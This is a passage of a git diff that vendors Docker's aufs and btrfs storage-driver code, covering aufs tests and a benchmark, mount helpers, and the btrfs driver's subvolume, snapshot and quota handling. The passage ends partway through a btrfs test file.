+		t.Fatalf("Error should not be nil with parent does not exist")
+	}
+}
+
+func TestGetDiff(t *testing.T) {
+	d := newDriver(t)
+	defer os.RemoveAll(tmp)
+
+	if err := d.CreateReadWrite("1", "", nil); err != nil {
+		t.Fatal(err)
+	}
+
+	diffPath, err := d.Get("1", "")
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	// Add a file to the diff path with a fixed size
+	size := int64(1024)
+
+	f, err := os.Create(path.Join(diffPath, "test_file"))
+	if err != nil {
+		t.Fatal(err)
+	}
+	if err := f.Truncate(size); err != nil {
+		t.Fatal(err)
+	}
+	f.Close()
+
+	a, err := d.Diff("1", "")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if a == nil {
+		t.Fatalf("Archive should not be nil")
+	}
+}
+
+func TestChanges(t *testing.T) {
+	d := newDriver(t)
+	defer os.RemoveAll(tmp)
+
+	if err := d.Create("1", "", nil); err != nil {
+		t.Fatal(err)
+	}
+
+	if err := d.CreateReadWrite("2", "1", nil); err != nil {
+		t.Fatal(err)
+	}
+
+	defer func() {
+		if err := d.Cleanup(); err != nil {
+			t.Fatal(err)
+		}
+	}()
+
+	mntPoint, err := d.Get("2", "")
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	// Create a file to save in the mountpoint
+	f, err := os.Create(path.Join(mntPoint, "test.txt"))
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if _, err := f.WriteString("testline"); err != nil {
+		t.Fatal(err)
+	}
+	if err := f.Close(); err != nil {
+		t.Fatal(err)
+	}
+
+	changes, err := d.Changes("2", "")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if len(changes) != 1 {
+		t.Fatalf("Dir 2 should have one change from parent got %d", len(changes))
+	}
+	change := changes[0]
+
+	expectedPath := "/test.txt"
+	if change.Path != expectedPath {
+		t.Fatalf("Expected path %s got %s", expectedPath, change.Path)
+	}
+
+	if change.Kind != archive.ChangeAdd {
+		t.Fatalf("Change kind should be ChangeAdd got %s", change.Kind)
+	}
+
+	if err := d.CreateReadWrite("3", "2", nil); err != nil {
+		t.Fatal(err)
+	}
+	mntPoint, err = d.Get("3", "")
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	// Create a file to save in the mountpoint
+	f, err = os.Create(path.Join(mntPoint, "test2.txt"))
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if _, err := f.WriteString("testline"); err != nil {
+		t.Fatal(err)
+	}
+	if err := f.Close(); err != nil {
+		t.Fatal(err)
+	}
+
+	changes, err = d.Changes("3", "2")
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if len(changes) != 1 {
+		t.Fatalf("Dir 2 should have one change from parent got %d", len(changes))
+	}
+	change = changes[0]
+
+	expectedPath = "/test2.txt"
+	if change.Path != expectedPath {
+		t.Fatalf("Expected path %s got %s", expectedPath, change.Path)
+	}
+
+	if change.Kind != archive.ChangeAdd {
+		t.Fatalf("Change kind should be ChangeAdd got %s", change.Kind)
+	}
+}
+
+func TestDiffSize(t *testing.T) {
+	d := newDriver(t)
+	defer os.RemoveAll(tmp)
+
+	if err := d.CreateReadWrite("1", "", nil); err != nil {
+		t.Fatal(err)
+	}
+
+	diffPath, err := d.Get("1", "")
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	// Add a file to the diff path with a fixed size
+	size := int64(1024)
+
+	f, err := os.Create(path.Join(diffPath, "test_file"))
+	if err != nil {
+		t.Fatal(err)
+	}
+	if err := f.Truncate(size); err != nil {
+		t.Fatal(err)
+	}
+	s, err := f.Stat()
+	if err != nil {
+		t.Fatal(err)
+	}
+	size = s.Size()
+	if err := f.Close(); err != nil {
+		t.Fatal(err)
+	}
+
+	diffSize, err := d.DiffSize("1", "")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if diffSize != size {
+		t.Fatalf("Expected size to be %d got %d", size, diffSize)
+	}
+}
+
+func TestChildDiffSize(t *testing.T) {
+	d := newDriver(t)
+	defer os.RemoveAll(tmp)
+	defer d.Cleanup()
+
+	if err := d.CreateReadWrite("1", "", nil); err != nil {
+		t.Fatal(err)
+	}
+
+	diffPath, err := d.Get("1", "")
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	// Add a file to the diff path with a fixed size
+	size := int64(1024)
+
+	f, err := os.Create(path.Join(diffPath, "test_file"))
+	if err != nil {
+		t.Fatal(err)
+	}
+	if err := f.Truncate(size); err != nil {
+		t.Fatal(err)
+	}
+	s, err := f.Stat()
+	if err != nil {
+		t.Fatal(err)
+	}
+	size = s.Size()
+	if err := f.Close(); err != nil {
+		t.Fatal(err)
+	}
+
+	diffSize, err := d.DiffSize("1", "")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if diffSize != size {
+		t.Fatalf("Expected size to be %d got %d", size, diffSize)
+	}
+
+	if err := d.Create("2", "1", nil); err != nil {
+		t.Fatal(err)
+	}
+
+	diffSize, err = d.DiffSize("2", "1")
+	if err != nil {
+		t.Fatal(err)
+	}
+	// The diff size for the child should be zero
+	if diffSize != 0 {
+		t.Fatalf("Expected size to be %d got %d", 0, diffSize)
+	}
+}
+
+func TestExists(t *testing.T) {
+	d := newDriver(t)
+	defer os.RemoveAll(tmp)
+	defer d.Cleanup()
+
+	if err := d.Create("1", "", nil); err != nil {
+		t.Fatal(err)
+	}
+
+	if d.Exists("none") {
+		t.Fatal("id none should not exist in the driver")
+	}
+
+	if !d.Exists("1") {
+		t.Fatal("id 1 should exist in the driver")
+	}
+}
+
+func TestStatus(t *testing.T) {
+	d := newDriver(t)
+	defer os.RemoveAll(tmp)
+	defer d.Cleanup()
+
+	if err := d.Create("1", "", nil); err != nil {
+		t.Fatal(err)
+	}
+
+	status := d.Status()
+	if status == nil || len(status) == 0 {
+		t.Fatal("Status should not be nil or empty")
+	}
+	rootDir := status[0]
+	dirs := status[2]
+	if rootDir[0] != "Root Dir" {
+		t.Fatalf("Expected Root Dir got %s", rootDir[0])
+	}
+	if rootDir[1] != d.rootPath() {
+		t.Fatalf("Expected %s got %s", d.rootPath(), rootDir[1])
+	}
+	if dirs[0] != "Dirs" {
+		t.Fatalf("Expected Dirs got %s", dirs[0])
+	}
+	if dirs[1] != "1" {
+		t.Fatalf("Expected 1 got %s", dirs[1])
+	}
+}
+
+func TestApplyDiff(t *testing.T) {
+	d := newDriver(t)
+	defer os.RemoveAll(tmp)
+	defer d.Cleanup()
+
+	if err := d.CreateReadWrite("1", "", nil); err != nil {
+		t.Fatal(err)
+	}
+
+	diffPath, err := d.Get("1", "")
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	// Add a file to the diff path with a fixed size
+	size := int64(1024)
+
+	f, err := os.Create(path.Join(diffPath, "test_file"))
+	if err != nil {
+		t.Fatal(err)
+	}
+	if err := f.Truncate(size); err != nil {
+		t.Fatal(err)
+	}
+	f.Close()
+
+	diff, err := d.Diff("1", "")
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if err := d.Create("2", "", nil); err != nil {
+		t.Fatal(err)
+	}
+	if err := d.Create("3", "2", nil); err != nil {
+		t.Fatal(err)
+	}
+
+	if err := d.applyDiff("3", diff); err != nil {
+		t.Fatal(err)
+	}
+
+	// Ensure that the file is in the mount point for id 3
+
+	mountPoint, err := d.Get("3", "")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if _, err := os.Stat(path.Join(mountPoint, "test_file")); err != nil {
+		t.Fatal(err)
+	}
+}
+
+func hash(c string) string {
+	h := sha256.New()
+	fmt.Fprint(h, c)
+	return hex.EncodeToString(h.Sum(nil))
+}
+
+func testMountMoreThan42Layers(t *testing.T, mountPath string) {
+	if err := os.MkdirAll(mountPath, 0755); err != nil {
+		t.Fatal(err)
+	}
+
+	defer os.RemoveAll(mountPath)
+	d := testInit(mountPath, t).(*Driver)
+	defer d.Cleanup()
+	var last string
+	var expected int
+
+	for i := 1; i < 127; i++ {
+		expected++
+		var (
+			parent  = fmt.Sprintf("%d", i-1)
+			current = fmt.Sprintf("%d", i)
+		)
+
+		if parent == "0" {
+			parent = ""
+		} else {
+			parent = hash(parent)
+		}
+		current = hash(current)
+
+		if err := d.CreateReadWrite(current, parent, nil); err != nil {
+			t.Logf("Current layer %d", i)
+			t.Error(err)
+		}
+		point, err := d.Get(current, "")
+		if err != nil {
+			t.Logf("Current layer %d", i)
+			t.Error(err)
+		}
+		f, err := os.Create(path.Join(point, current))
+		if err != nil {
+			t.Logf("Current layer %d", i)
+			t.Error(err)
+		}
+		f.Close()
+
+		if i%10 == 0 {
+			if err := os.Remove(path.Join(point, parent)); err != nil {
+				t.Logf("Current layer %d", i)
+				t.Error(err)
+			}
+			expected--
+		}
+		last = current
+	}
+
+	// Perform the actual mount for the top most image
+	point, err := d.Get(last, "")
+	if err != nil {
+		t.Error(err)
+	}
+	files, err := ioutil.ReadDir(point)
+	if err != nil {
+		t.Error(err)
+	}
+	if len(files) != expected {
+		t.Errorf("Expected %d got %d", expected, len(files))
+	}
+}
+
+func TestMountMoreThan42Layers(t *testing.T) {
+	os.RemoveAll(tmpOuter)
+	testMountMoreThan42Layers(t, tmp)
+}
+
+func TestMountMoreThan42LayersMatchingPathLength(t *testing.T) {
+	defer os.RemoveAll(tmpOuter)
+	zeroes := "0"
+	for {
+		// This finds a mount path so that when combined into aufs mount options
+		// 4096 byte boundary would be in between the paths or in permission
+		// section. For '/tmp' it will use '/tmp/aufs-tests/00000000/aufs'
+		mountPath := path.Join(tmpOuter, zeroes, "aufs")
+		pathLength := 77 + len(mountPath)
+
+		if mod := 4095 % pathLength; mod == 0 || mod > pathLength-2 {
+			t.Logf("Using path: %s", mountPath)
+			testMountMoreThan42Layers(t, mountPath)
+			return
+		}
+		zeroes += "0"
+	}
+}
+
+func BenchmarkConcurrentAccess(b *testing.B) {
+	b.StopTimer()
+	b.ResetTimer()
+
+	d := newDriver(b)
+	defer os.RemoveAll(tmp)
+	defer d.Cleanup()
+
+	numConcurent := 256
+	// create a bunch of ids
+	var ids []string
+	for i := 0; i < numConcurent; i++ {
+		ids = append(ids, stringid.GenerateNonCryptoID())
+	}
+
+	if err := d.Create(ids[0], "", nil); err != nil {
+		b.Fatal(err)
+	}
+
+	if err := d.Create(ids[1], ids[0], nil); err != nil {
+		b.Fatal(err)
+	}
+
+	parent := ids[1]
+	ids = append(ids[2:])
+
+	chErr := make(chan error, numConcurent)
+	var outerGroup sync.WaitGroup
+	outerGroup.Add(len(ids))
+	b.StartTimer()
+
+	// here's the actual bench
+	for _, id := range ids {
+		go func(id string) {
+			defer outerGroup.Done()
+			if err := d.Create(id, parent, nil); err != nil {
+				b.Logf("Create %s failed", id)
+				chErr <- err
+				return
+			}
+			var innerGroup sync.WaitGroup
+			for i := 0; i < b.N; i++ {
+				innerGroup.Add(1)
+				go func() {
+					d.Get(id, "")
+					d.Put(id)
+					innerGroup.Done()
+				}()
+			}
+			innerGroup.Wait()
+			d.Remove(id)
+		}(id)
+	}
+
+	outerGroup.Wait()
+	b.StopTimer()
+	close(chErr)
+	for err := range chErr {
+		if err != nil {
+			b.Log(err)
+			b.Fail()
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/aufs/dirs.go b/vendor/github.com/docker/docker/daemon/graphdriver/aufs/dirs.go
new file mode 100644
index 0000000000..d2325fc46c
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/aufs/dirs.go
@@ -0,0 +1,64 @@
+// +build linux
+
+package aufs
+
+import (
+	"bufio"
+	"io/ioutil"
+	"os"
+	"path"
+)
+
+// Return all the directories
+func loadIds(root string) ([]string, error) {
+	dirs, err := ioutil.ReadDir(root)
+	if err != nil {
+		return nil, err
+	}
+	out := []string{}
+	for _, d := range dirs {
+		if !d.IsDir() {
+			out = append(out, d.Name())
+		}
+	}
+	return out, nil
+}
+
+// Read the layers file for the current id and return all the
+// layers represented by new lines in the file
+//
+// If there are no lines in the file then the id has no parent
+// and an empty slice is returned.
+func getParentIDs(root, id string) ([]string, error) {
+	f, err := os.Open(path.Join(root, "layers", id))
+	if err != nil {
+		return nil, err
+	}
+	defer f.Close()
+
+	out := []string{}
+	s := bufio.NewScanner(f)
+
+	for s.Scan() {
+		if t := s.Text(); t != "" {
+			out = append(out, s.Text())
+		}
+	}
+	return out, s.Err()
+}
+
+func (a *Driver) getMountpoint(id string) string {
+	return path.Join(a.mntPath(), id)
+}
+
+func (a *Driver) mntPath() string {
+	return path.Join(a.rootPath(), "mnt")
+}
+
+func (a *Driver) getDiffPath(id string) string {
+	return path.Join(a.diffPath(), id)
+}
+
+func (a *Driver) diffPath() string {
+	return path.Join(a.rootPath(), "diff")
+}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/aufs/mount.go b/vendor/github.com/docker/docker/daemon/graphdriver/aufs/mount.go
new file mode 100644
index 0000000000..da1e892f44
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/aufs/mount.go
@@ -0,0 +1,21 @@
+// +build linux
+
+package aufs
+
+import (
+	"os/exec"
+	"syscall"
+
+	"github.com/Sirupsen/logrus"
+)
+
+// Unmount the target specified.
+func Unmount(target string) error {
+	if err := exec.Command("auplink", target, "flush").Run(); err != nil {
+		logrus.Warnf("Couldn't run auplink before unmount %s: %s", target, err)
+	}
+	if err := syscall.Unmount(target, 0); err != nil {
+		return err
+	}
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/aufs/mount_linux.go b/vendor/github.com/docker/docker/daemon/graphdriver/aufs/mount_linux.go
new file mode 100644
index 0000000000..8062bae420
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/aufs/mount_linux.go
@@ -0,0 +1,7 @@
+package aufs
+
+import "syscall"
+
+func mount(source string, target string, fstype string, flags uintptr, data string) error {
+	return syscall.Mount(source, target, fstype, flags, data)
+}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/aufs/mount_unsupported.go b/vendor/github.com/docker/docker/daemon/graphdriver/aufs/mount_unsupported.go
new file mode 100644
index 0000000000..d030b06637
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/aufs/mount_unsupported.go
@@ -0,0 +1,12 @@
+// +build !linux
+
+package aufs
+
+import "errors"
+
+// MsRemount declared to specify a non-linux system mount.
+const MsRemount = 0
+
+func mount(source string, target string, fstype string, flags uintptr, data string) (err error) {
+	return errors.New("mount is not implemented on this platform")
+}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/btrfs.go b/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/btrfs.go
new file mode 100644
index 0000000000..44420f11a7
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/btrfs.go
@@ -0,0 +1,530 @@
+// +build linux
+
+package btrfs
+
+/*
+#include <stdlib.h>
+#include <dirent.h>
+#include <btrfs/ioctl.h>
+#include <btrfs/ctree.h>
+
+static void set_name_btrfs_ioctl_vol_args_v2(struct btrfs_ioctl_vol_args_v2* btrfs_struct, const char* value) {
+    snprintf(btrfs_struct->name, BTRFS_SUBVOL_NAME_MAX, "%s", value);
+}
+*/
+import "C"
+
+import (
+	"fmt"
+	"os"
+	"path"
+	"path/filepath"
+	"strings"
+	"syscall"
+	"unsafe"
+
+	"github.com/docker/docker/daemon/graphdriver"
+	"github.com/docker/docker/pkg/idtools"
+	"github.com/docker/docker/pkg/mount"
+	"github.com/docker/docker/pkg/parsers"
+	"github.com/docker/go-units"
+	"github.com/opencontainers/runc/libcontainer/label"
+)
+
+func init() {
+	graphdriver.Register("btrfs", Init)
+}
+
+var (
+	quotaEnabled  = false
+	userDiskQuota = false
+)
+
+type btrfsOptions struct {
+	minSpace uint64
+	size     uint64
+}
+
+// Init returns a new BTRFS driver.
+// An error is returned if BTRFS is not supported.
+func Init(home string, options []string, uidMaps, gidMaps []idtools.IDMap) (graphdriver.Driver, error) {
+
+	fsMagic, err := graphdriver.GetFSMagic(home)
+	if err != nil {
+		return nil, err
+	}
+
+	if fsMagic != graphdriver.FsMagicBtrfs {
+		return nil, graphdriver.ErrPrerequisites
+	}
+
+	rootUID, rootGID, err := idtools.GetRootUIDGID(uidMaps, gidMaps)
+	if err != nil {
+		return nil, err
+	}
+	if err := idtools.MkdirAllAs(home, 0700, rootUID, rootGID); err != nil {
+		return nil, err
+	}
+
+	if err := mount.MakePrivate(home); err != nil {
+		return nil, err
+	}
+
+	opt, err := parseOptions(options)
+	if err != nil {
+		return nil, err
+	}
+
+	if userDiskQuota {
+		if err := subvolEnableQuota(home); err != nil {
+			return nil, err
+		}
+		quotaEnabled = true
+	}
+
+	driver := &Driver{
+		home:    home,
+		uidMaps: uidMaps,
+		gidMaps: gidMaps,
+		options: opt,
+	}
+
+	return graphdriver.NewNaiveDiffDriver(driver, uidMaps, gidMaps), nil
+}
+
+func parseOptions(opt []string) (btrfsOptions, error) {
+	var options btrfsOptions
+	for _, option := range opt {
+		key, val, err := parsers.ParseKeyValueOpt(option)
+		if err != nil {
+			return options, err
+		}
+		key = strings.ToLower(key)
+		switch key {
+		case "btrfs.min_space":
+			minSpace, err := units.RAMInBytes(val)
+			if err != nil {
+				return options, err
+			}
+			userDiskQuota = true
+			options.minSpace = uint64(minSpace)
+		default:
+			return options, fmt.Errorf("Unknown option %s", key)
+		}
+	}
+	return options, nil
+}
+
+// Driver contains information about the filesystem mounted.
+type Driver struct {
+	//root of the file system
+	home    string
+	uidMaps []idtools.IDMap
+	gidMaps []idtools.IDMap
+	options btrfsOptions
+}
+
+// String prints the name of the driver (btrfs).
+func (d *Driver) String() string {
+	return "btrfs"
+}
+
+// Status returns current driver information in a two dimensional string array.
+// Output contains "Build Version" and "Library Version" of the btrfs libraries used.
+// Version information can be used to check compatibility with your kernel.
+func (d *Driver) Status() [][2]string {
+	status := [][2]string{}
+	if bv := btrfsBuildVersion(); bv != "-" {
+		status = append(status, [2]string{"Build Version", bv})
+	}
+	if lv := btrfsLibVersion(); lv != -1 {
+		status = append(status, [2]string{"Library Version", fmt.Sprintf("%d", lv)})
+	}
+	return status
+}
+
+// GetMetadata returns empty metadata for this driver.
+func (d *Driver) GetMetadata(id string) (map[string]string, error) {
+	return nil, nil
+}
+
+// Cleanup unmounts the home directory.
+func (d *Driver) Cleanup() error {
+	if quotaEnabled {
+		if err := subvolDisableQuota(d.home); err != nil {
+			return err
+		}
+	}
+
+	return mount.Unmount(d.home)
+}
+
+func free(p *C.char) {
+	C.free(unsafe.Pointer(p))
+}
+
+func openDir(path string) (*C.DIR, error) {
+	Cpath := C.CString(path)
+	defer free(Cpath)
+
+	dir := C.opendir(Cpath)
+	if dir == nil {
+		return nil, fmt.Errorf("Can't open dir")
+	}
+	return dir, nil
+}
+
+func closeDir(dir *C.DIR) {
+	if dir != nil {
+		C.closedir(dir)
+	}
+}
+
+func getDirFd(dir *C.DIR) uintptr {
+	return uintptr(C.dirfd(dir))
+}
+
+func subvolCreate(path, name string) error {
+	dir, err := openDir(path)
+	if err != nil {
+		return err
+	}
+	defer closeDir(dir)
+
+	var args C.struct_btrfs_ioctl_vol_args
+	for i, c := range []byte(name) {
+		args.name[i] = C.char(c)
+	}
+
+	_, _, errno := syscall.Syscall(syscall.SYS_IOCTL, getDirFd(dir), C.BTRFS_IOC_SUBVOL_CREATE,
+		uintptr(unsafe.Pointer(&args)))
+	if errno != 0 {
+		return fmt.Errorf("Failed to create btrfs subvolume: %v", errno.Error())
+	}
+	return nil
+}
+
+func subvolSnapshot(src, dest, name string) error {
+	srcDir, err := openDir(src)
+	if err != nil {
+		return err
+	}
+	defer closeDir(srcDir)
+
+	destDir, err := openDir(dest)
+	if err != nil {
+		return err
+	}
+	defer closeDir(destDir)
+
+	var args C.struct_btrfs_ioctl_vol_args_v2
+	args.fd = C.__s64(getDirFd(srcDir))
+
+	var cs = C.CString(name)
+	C.set_name_btrfs_ioctl_vol_args_v2(&args, cs)
+	C.free(unsafe.Pointer(cs))
+
+	_, _, errno := syscall.Syscall(syscall.SYS_IOCTL, getDirFd(destDir), C.BTRFS_IOC_SNAP_CREATE_V2,
+		uintptr(unsafe.Pointer(&args)))
+	if errno != 0 {
+		return fmt.Errorf("Failed to create btrfs snapshot: %v", errno.Error())
+	}
+	return nil
+}
+
+func isSubvolume(p string) (bool, error) {
+	var bufStat syscall.Stat_t
+	if err := syscall.Lstat(p, &bufStat); err != nil {
+		return false, err
+	}
+
+	// return true if it is a btrfs subvolume
+	return bufStat.Ino == C.BTRFS_FIRST_FREE_OBJECTID, nil
+}
+
+func subvolDelete(dirpath, name string) error {
+	dir, err := openDir(dirpath)
+	if err != nil {
+		return err
+	}
+	defer closeDir(dir)
+	fullPath := path.Join(dirpath, name)
+
+	var args C.struct_btrfs_ioctl_vol_args
+
+	// walk the btrfs subvolumes
+	walkSubvolumes := func(p string, f os.FileInfo, err error) error {
+		if err != nil {
+			if os.IsNotExist(err) && p != fullPath {
+				// missing most likely because the path was a subvolume that got removed in the previous iteration
+				// since it's gone anyway, we don't care
+				return nil
+			}
+			return fmt.Errorf("error walking subvolumes: %v", err)
+		}
+		// we want to check children only so skip itself
+		// it will be removed after the filepath walk anyways
+		if f.IsDir() && p != fullPath {
+			sv, err := isSubvolume(p)
+			if err != nil {
+				return fmt.Errorf("Failed to test if %s is a btrfs subvolume: %v", p, err)
+			}
+			if sv {
+				if err := subvolDelete(path.Dir(p), f.Name()); err != nil {
+					return fmt.Errorf("Failed to destroy btrfs child subvolume (%s) of parent (%s): %v", p, dirpath, err)
+				}
+			}
+		}
+		return nil
+	}
+	if err := filepath.Walk(path.Join(dirpath, name), walkSubvolumes); err != nil {
+		return fmt.Errorf("Recursively walking subvolumes for %s failed: %v", dirpath, err)
+	}
+
+	// all subvolumes have been removed
+	// now remove the one originally passed in
+	for i, c := range []byte(name) {
+		args.name[i] = C.char(c)
+	}
+	_, _, errno := syscall.Syscall(syscall.SYS_IOCTL, getDirFd(dir), C.BTRFS_IOC_SNAP_DESTROY,
+		uintptr(unsafe.Pointer(&args)))
+	if errno != 0 {
+		return fmt.Errorf("Failed to destroy btrfs snapshot %s for %s: %v", dirpath, name, errno.Error())
+	}
+	return nil
+}
+
+func subvolEnableQuota(path string) error {
+	dir, err := openDir(path)
+	if err != nil {
+		return err
+	}
+	defer closeDir(dir)
+
+	var args C.struct_btrfs_ioctl_quota_ctl_args
+	args.cmd = C.BTRFS_QUOTA_CTL_ENABLE
+	_, _, errno := syscall.Syscall(syscall.SYS_IOCTL, getDirFd(dir), C.BTRFS_IOC_QUOTA_CTL,
+		uintptr(unsafe.Pointer(&args)))
+	if errno != 0 {
+		return fmt.Errorf("Failed to enable btrfs quota for %s: %v", dir, errno.Error())
+	}
+
+	return nil
+}
+
+func subvolDisableQuota(path string) error {
+	dir, err := openDir(path)
+	if err != nil {
+		return err
+	}
+	defer closeDir(dir)
+
+	var args C.struct_btrfs_ioctl_quota_ctl_args
+	args.cmd = C.BTRFS_QUOTA_CTL_DISABLE
+	_, _, errno := syscall.Syscall(syscall.SYS_IOCTL, getDirFd(dir), C.BTRFS_IOC_QUOTA_CTL,
+		uintptr(unsafe.Pointer(&args)))
+	if errno != 0 {
+		return fmt.Errorf("Failed to disable btrfs quota for %s: %v", dir, errno.Error())
+	}
+
+	return nil
+}
+
+func subvolRescanQuota(path string) error {
+	dir, err := openDir(path)
+	if err != nil {
+		return err
+	}
+	defer closeDir(dir)
+
+	var args C.struct_btrfs_ioctl_quota_rescan_args
+	_, _, errno := syscall.Syscall(syscall.SYS_IOCTL, getDirFd(dir), C.BTRFS_IOC_QUOTA_RESCAN_WAIT,
+		uintptr(unsafe.Pointer(&args)))
+	if errno != 0 {
+		return fmt.Errorf("Failed to rescan btrfs quota for %s: %v", dir, errno.Error())
+	}
+
+	return nil
+}
+
+func subvolLimitQgroup(path string, size uint64) error {
+	dir, err := openDir(path)
+	if err != nil {
+		return err
+	}
+	defer closeDir(dir)
+
+	var args C.struct_btrfs_ioctl_qgroup_limit_args
+	args.lim.max_referenced = C.__u64(size)
+	args.lim.flags = C.BTRFS_QGROUP_LIMIT_MAX_RFER
+	_, _, errno := syscall.Syscall(syscall.SYS_IOCTL, getDirFd(dir), C.BTRFS_IOC_QGROUP_LIMIT,
+		uintptr(unsafe.Pointer(&args)))
+	if errno != 0 {
+		return fmt.Errorf("Failed to limit qgroup for %s: %v", dir, errno.Error())
+	}
+
+	return nil
+}
+
+func (d *Driver) subvolumesDir() string {
+	return path.Join(d.home, "subvolumes")
+}
+
+func (d *Driver) subvolumesDirID(id string) string {
+	return path.Join(d.subvolumesDir(), id)
+}
+
+// CreateReadWrite creates a layer that is writable for use as a container
+// file system.
+func (d *Driver) CreateReadWrite(id, parent string, opts *graphdriver.CreateOpts) error {
+	return d.Create(id, parent, opts)
+}
+
+// Create the filesystem with given id.
+func (d *Driver) Create(id, parent string, opts *graphdriver.CreateOpts) error {
+	subvolumes := path.Join(d.home, "subvolumes")
+	rootUID, rootGID, err := idtools.GetRootUIDGID(d.uidMaps, d.gidMaps)
+	if err != nil {
+		return err
+	}
+	if err := idtools.MkdirAllAs(subvolumes, 0700, rootUID, rootGID); err != nil {
+		return err
+	}
+	if parent == "" {
+		if err := subvolCreate(subvolumes, id); err != nil {
+			return err
+		}
+	} else {
+		parentDir := d.subvolumesDirID(parent)
+		st, err := os.Stat(parentDir)
+		if err != nil {
+			return err
+		}
+		if !st.IsDir() {
+			return fmt.Errorf("%s: not a directory", parentDir)
+		}
+		if err := subvolSnapshot(parentDir, subvolumes, id); err != nil {
+			return err
+		}
+	}
+
+	var storageOpt map[string]string
+	if opts != nil {
+		storageOpt = opts.StorageOpt
+	}
+
+	if _, ok := storageOpt["size"]; ok {
+		driver := &Driver{}
+		if err := d.parseStorageOpt(storageOpt, driver); err != nil {
+			return err
+		}
+		if err := d.setStorageSize(path.Join(subvolumes, id), driver); err != nil {
+			return err
+		}
+	}
+
+	// if we have a remapped root (user namespaces enabled), change the created snapshot
+	// dir ownership to match
+	if rootUID != 0 || rootGID != 0 {
+		if err := os.Chown(path.Join(subvolumes, id), rootUID, rootGID); err != nil {
+			return err
+		}
+	}
+
+	mountLabel := ""
+	if opts != nil {
+		mountLabel = opts.MountLabel
+	}
+
+	return label.Relabel(path.Join(subvolumes, id), mountLabel, false)
+}
+
+// Parse btrfs storage options
+func (d *Driver) parseStorageOpt(storageOpt map[string]string, driver *Driver) error {
+	// Read size to change the subvolume disk quota per container
+	for key, val := range storageOpt {
+		key := strings.ToLower(key)
+		switch key {
+		case "size":
+			size, err := units.RAMInBytes(val)
+			if err != nil {
+				return err
+			}
+			driver.options.size = uint64(size)
+		default:
+			return fmt.Errorf("Unknown option %s", key)
+		}
+	}
+
+	return nil
+}
+
+// Set btrfs storage size
+func (d *Driver) setStorageSize(dir string, driver *Driver) error {
+	if driver.options.size <= 0 {
+		return fmt.Errorf("btrfs: invalid storage size: %s", units.HumanSize(float64(driver.options.size)))
+	}
+	if d.options.minSpace > 0 && driver.options.size < d.options.minSpace {
+		return fmt.Errorf("btrfs: storage size cannot be less than %s", units.HumanSize(float64(d.options.minSpace)))
+	}
+
+	if !quotaEnabled {
+		if err := subvolEnableQuota(d.home); err != nil {
+			return err
+		}
+		quotaEnabled = true
+	}
+
+	if err := subvolLimitQgroup(dir, driver.options.size); err != nil {
+		return err
+	}
+
+	return nil
+}
+
+// Remove the filesystem with given id.
+func (d *Driver) Remove(id string) error {
+	dir := d.subvolumesDirID(id)
+	if _, err := os.Stat(dir); err != nil {
+		return err
+	}
+	if err := subvolDelete(d.subvolumesDir(), id); err != nil {
+		return err
+	}
+	if err := os.RemoveAll(dir); err != nil && !os.IsNotExist(err) {
+		return err
+	}
+	if err := subvolRescanQuota(d.home); err != nil {
+		return err
+	}
+	return nil
+}
+
+// Get the requested filesystem id.
+func (d *Driver) Get(id, mountLabel string) (string, error) {
+	dir := d.subvolumesDirID(id)
+	st, err := os.Stat(dir)
+	if err != nil {
+		return "", err
+	}
+
+	if !st.IsDir() {
+		return "", fmt.Errorf("%s: not a directory", dir)
+	}
+
+	return dir, nil
+}
+
+// Put is not implemented for BTRFS as there is no cleanup required for the id.
+func (d *Driver) Put(id string) error {
+	// Get() creates no runtime resources (like e.g. mounts)
+	// so this doesn't need to do anything.
+	return nil
+}
+
+// Exists checks if the id exists in the filesystem.
+func (d *Driver) Exists(id string) bool {
+	dir := d.subvolumesDirID(id)
+	_, err := os.Stat(dir)
+	return err == nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/btrfs_test.go b/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/btrfs_test.go
new file mode 100644
index 0000000000..0038dbcdcd
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/btrfs_test.go
@@ -0,0 +1,63 @@
+// +build linux
+
+package btrfs
+
+import (
+	"os"
+	"path"
+	"testing"
+
+	"github.com/docker/docker/daemon/graphdriver/graphtest"
+)
+
+// This avoids creating a new driver for each test if all tests are run
+// Make sure to put new tests between TestBtrfsSetup and TestBtrfsTeardown
+func TestBtrfsSetup(t *testing.T) {
+	graphtest.GetDriver(t, "btrfs")
+}
+
+func TestBtrfsCreateEmpty(t *testing.T) {
+	graphtest.DriverTestCreateEmpty(t, "btrfs")
+}
+
+func TestBtrfsCreateBase(t *testing.T) {
+	graphtest.DriverTestCreateBase(t, "btrfs")
+}
+
+func TestBtrfsCreateSnap(t *testing.T) {
+	graphtest.DriverTestCreateSnap(t, "btrfs")
+}
+
+func TestBtrfsSubvolDelete(t *testing.T) {
+	d := graphtest.GetDriver(t, "btrfs")
+	if err := d.CreateReadWrite("test", "", nil); err != nil {
+		t.Fatal(err)
+	}
+	defer graphtest.PutDriver(t)
+
+	dir, err := d.Get("test", "")
